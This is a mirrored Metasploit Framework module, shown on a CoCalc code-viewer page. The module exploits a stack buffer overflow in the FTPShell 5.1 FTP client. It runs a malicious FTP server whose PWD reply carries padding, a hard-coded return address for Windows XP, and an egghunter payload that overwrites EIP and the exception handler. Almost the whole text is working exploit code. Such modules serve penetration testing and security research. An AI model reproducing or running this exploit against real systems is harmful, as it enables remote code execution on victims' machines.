Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb
24104 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Exploit::Remote::FtpServer

10
  include Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FTPShell 5.1 Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets

19
          triggered when the ftp client tries to process an overly long response to a PWD

20
          command. This will overwrite the saved EIP and structured exception handler.

21
        },

22
        'Author' => [

23
          'corelanc0d3r <peter.ve[at]corelan.be>'	# found bug, wrote the exploit

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2017-6465' ],

28
          [ 'OSVDB', '68639'],

29
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],

30
        ],

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'Windows XP Universal', { 'Offset' => 399, 'Ret' => 0x779A5483 } ], # jmp ebp [setupapi.dll]]

40
        ],

41
        'Privileged' => false,

42
        'DisclosureDate' => '2010-10-12',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51
  end

52


53
  def setup

54
    super

55
  end

56


57
  def on_client_unknown_command(c, cmd, arg)

58
    c.put("200 OK\r\n")

59
  end

60


61
  def on_client_command_pwd(c, arg)

62
    badchars = ""

63
    eggoptions =

64
      {

65
        :checksum => true,

66
        :eggtag => "w00t"

67
      }

68
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)

69


70
    print_status(" - PWD command -> Sending payload")

71
    junk = "A" * target['Offset']

72
    nops = "A" * 10

73
    tweakhunter = "\x5a\x5a"

74
    eip = [target.ret].pack('V')

75
    buffer = junk + eip + nops + tweakhunter + hunter + egg

76
    pwdoutput = "257  \"/" + buffer + "\" is current directory\r\n"

77
    c.put(pwdoutput)

78
    print_status(" - Sent #{pwdoutput.length} bytes, wait for hunter")

79
    return

80
  end

81
end

82


83